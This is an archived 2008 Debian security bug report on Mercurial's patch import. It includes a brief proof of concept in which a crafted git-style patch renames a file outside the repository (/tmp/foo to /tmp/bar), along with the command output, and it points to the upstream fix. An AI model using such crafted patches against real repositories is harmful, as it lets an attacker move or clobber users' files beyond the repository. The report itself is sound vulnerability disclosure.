thr3ads.net - Secure testing team - [Secure-testing-team] Bug#488628: mercurial: Insufficient input validation [Jun 2008]

If this information is useful, please help other people find it:
Share via:

Twitter
Facebook
Email

Steffen Joeris

2008-Jun-30 07:42 UTC

[Secure-testing-team] Bug#488628: mercurial: Insufficient input validation

Package: mercurial
Severity: grave
Tags: security, patch
Justification: user security hole

Hi

It is possible to rename arbitrary files, even outside
the repository by using a maliciously crafted patch.

Proof of concept:

echo quux > /tmp/foo
cat /tmp/foo /tmp/bar
quux
cat: /tmp/bar: No such file or directory

hg init hg-sandbox; cd hg-sandbox
hg import - <<EOF> diff --git a/a b/b
> rename from /tmp/foo
> rename to /tmp/bar
> EOFapplying patch from stdin
/tmp/foo not tracked!
abort: /tmp/bar not under root

cat /tmp/foo /tmp/bar
cat: /tmp/foo: No such file or directory
quux


The issue has been fixed upstream[0].
Please upload with high urgency to make sure the fix reaches testing
soon.

Cheers
Steffen

[0]: http://www.selenic.com/hg/rev/87c704ac92d4

Secure testing team - Jun 2008 - Bug#488628: mercurial: Insufficient input validation

[Secure-testing-team] Bug#488628: mercurial: Insufficient input validation